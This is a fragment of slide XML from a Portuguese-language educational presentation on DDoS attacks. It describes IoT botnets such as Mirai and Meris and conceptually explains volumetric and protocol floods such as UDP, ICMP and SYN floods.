          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3600000">
            <a:off x="3776066" y="3997849"/>
            <a:ext cx="329907" cy="557129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64" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3775109" y="4001421"/>
            <a:ext cx="14288" cy="1099970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pic>
        <p:nvPicPr>
          <p:cNvPr id="6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7463" y="5904309"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="5900738"/>
            <a:ext cx="9720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Altamente resiliente</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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57463" y="6104334"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714625" y="6100763"/>
            <a:ext cx="106087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Difícil de desmantelar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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7463" y="6304359"/>
            <a:ext cx="62508" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2677120" y="6300788"/>
            <a:ext cx="76622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Mais complexa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7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57463" y="6504384"/>
            <a:ext cx="62508" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2677120" y="6500813"/>
            <a:ext cx="108319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Controle menos direto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="145732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Ameaça das Botnets IoT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="1771650"/>
            <a:ext cx="4200525" cy="201453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5" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="1885950"/>
            <a:ext cx="257175" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DC2626"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76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9175" y="1943100"/>
            <a:ext cx="142875" cy="142875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5114925" y="1928813"/>
            <a:ext cx="22291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 que IoT é um problema crítico?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1013" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78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57775" y="2286000"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2257425"/>
            <a:ext cx="35575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Segurança frequentemente negligenciada (senhas padrão, interfaces expostas)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80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57775" y="2714625"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2686050"/>
            <a:ext cx="243473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Atualizações de firmware raras ou inexistentes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82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57775" y="2971800"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2943225"/>
            <a:ext cx="35575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Crescimento exponencial de dispositivos conectados (&gt;30 bilhões em 2025)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="84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57775" y="3400425"/>
            <a:ext cx="142875" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5286375" y="3371850"/>
            <a:ext cx="264497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Conectividade permanente e alta largura de banda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="3943350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Botnets Notórias</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="4229100"/>
            <a:ext cx="2043113" cy="7858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88" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="4314825"/>
            <a:ext cx="1943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Mirai (2016)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="4486275"/>
            <a:ext cx="19431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Infectou &gt;600.000 dispositivos IoT, causou um dos maiores ataques DDoS da história (1.2 Tbps) contra Dyn DNS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="4229100"/>
            <a:ext cx="2043113" cy="7858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1" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="4314825"/>
            <a:ext cx="1943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Meris (2021)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="4486275"/>
            <a:ext cx="19431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Composta por roteadores MikroTik comprometidos, responsável por ataques de até 21.8 milhões de RPS.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="5114925"/>
            <a:ext cx="2043113" cy="7858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4" name="Text 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="5200650"/>
            <a:ext cx="1943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Mantis (2022)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Text 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="5372100"/>
            <a:ext cx="19431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Utilizou apenas 5.000 dispositivos para gerar ataques de 26M RPS, mostrando alta eficiência por bot.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="5114925"/>
            <a:ext cx="2043113" cy="771525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7" name="Text 70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="5200650"/>
            <a:ext cx="1943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ASUS Botnet (2024)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="Text 71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="5372100"/>
            <a:ext cx="19431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Explorou CVE crítica em roteadores ASUS, gerando ataques de 3.8 Tbps.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="720090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00" name="Text 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="728662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01" name="Text 74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="728662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3/14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8438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Ataques: Volumétricos e de Protocolo (L3/L4)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que visam saturar a largura de banda e recursos de rede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93056"/>
            <a:ext cx="56675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Objetivo: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57225" y="1593056"/>
            <a:ext cx="772724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Saturar a largura de banda da rede ou esgotar recursos de equipamentos intermediários (firewalls, roteadores) através de grande volume de pacotes nas camadas 3 (Rede) e 4 (Transporte).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="2200275"/>
            <a:ext cx="4200525" cy="23288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428625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2436019"/>
            <a:ext cx="171450" cy="1714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2969" y="2343150"/>
            <a:ext cx="79901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 Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1677693" y="2364581"/>
            <a:ext cx="295294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1677693" y="2364581"/>
            <a:ext cx="366731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675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="2571750"/>
            <a:ext cx="30328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Inundação com pacotes UDP para portas aleatórias ou específicas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="2886075"/>
            <a:ext cx="35290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servidor verifica qual aplicação está escutando na porta de destino. Se nenhuma aplicação estiver ativa, responde com ICMP "Destination Unreachable".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885825" y="3486150"/>
            <a:ext cx="3457575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971550" y="3571875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Impacto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="90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3818334"/>
            <a:ext cx="50006" cy="10001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78706" y="3814763"/>
            <a:ext cx="214538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Consome largura de banda de entrada e saída</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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3989784"/>
            <a:ext cx="50006" cy="10001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078706" y="3986213"/>
            <a:ext cx="193930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Sobrecarrega recursos de processamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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" y="4161234"/>
            <a:ext cx="50006" cy="100013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078706" y="4157663"/>
            <a:ext cx="209317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Pode usar IP spoofing para dificultar filtragem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="2200275"/>
            <a:ext cx="4200525" cy="2314575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1" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="23431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69" y="2436019"/>
            <a:ext cx="171450" cy="17145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5264944" y="2343150"/>
            <a:ext cx="8545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ICMP Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6105199" y="2364581"/>
            <a:ext cx="328613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6105199" y="2364581"/>
            <a:ext cx="400050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ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="2571750"/>
            <a:ext cx="17169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Também conhecido como Ping Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="2886075"/>
            <a:ext cx="35290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Inunda o alvo com pacotes ICMP Echo Request (ping). O servidor é forçado a processar cada requisição e enviar um Echo Reply.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="3314700"/>
            <a:ext cx="3457575" cy="10001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9" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="3400425"/>
            <a:ext cx="33575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Variações</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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525" y="3646884"/>
            <a:ext cx="50006" cy="100013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5450681" y="3643313"/>
            <a:ext cx="72347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Smurf Attack:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="3643313"/>
            <a:ext cx="3310207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Echo Requests para endereço de broadcast com IP de origem falsificado para o da vítima</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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525" y="3961209"/>
            <a:ext cx="50006" cy="100013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5450681" y="3957638"/>
            <a:ext cx="74925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Ping of Death:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="3957638"/>
            <a:ext cx="3256099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Pacotes ICMP malformados que excedem o tamanho máximo permitido</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="4686300"/>
            <a:ext cx="4200525" cy="25288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7" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428625" y="4829175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4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3" y="4922044"/>
            <a:ext cx="214313" cy="171450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892969" y="4829175"/>
            <a:ext cx="111657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SYN Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995255" y="4850606"/>
            <a:ext cx="285750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1" name="Text 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995255" y="4850606"/>
            <a:ext cx="357188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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="892969" y="5057775"/>
            <a:ext cx="19153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 o handshake de três vias do TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="885825" y="5372100"/>
            <a:ext cx="35290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grande número de pacotes SYN (início de conexão) com IPs de origem falsificados. O servidor responde com SYN-ACK e mantém conexões semi-abertas, esgotando a tabela de conexões.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1534092" y="5972175"/>
            <a:ext cx="285750" cy="28575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5530" y="6057900"/>
            <a:ext cx="142875" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507778" y="6286500"/>
            <a:ext cx="40981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Atacante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2017607" y="6072188"/>
            <a:ext cx="24771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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody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8582" y="6186488"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2382050" y="5972175"/>
            <a:ext cx="285750" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF4444"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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7775" y="6057900"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2365335" y="6286500"/>
            <a:ext cx="39064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Servidor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855993" y="6072188"/>
            <a:ext cx="4525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SYN-ACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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9380" y="6186488"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3422079" y="5972175"/>
            <a:ext cx="285750" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6B7280"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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8343" y="6057900"/>
            <a:ext cx="73223" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408518" y="6286500"/>
            <a:ext cx="38433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IP Falso</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="4686300"/>
            <a:ext cx="4200525" cy="25288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68" name="Shape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="4829175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6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2038" y="4922044"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="4829175"/>
            <a:ext cx="15643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Outras Variações TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815026" y="4850606"/>
            <a:ext cx="285750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2" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815026" y="4850606"/>
            <a:ext cx="357188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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="675" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5264944" y="5057775"/>
            <a:ext cx="210436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Exploração de diferentes flags e estados TCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="5372100"/>
            <a:ext cx="1685925" cy="8001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75" name="Text 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5343525" y="5457825"/>
            <a:ext cx="1585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ACK Flood</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
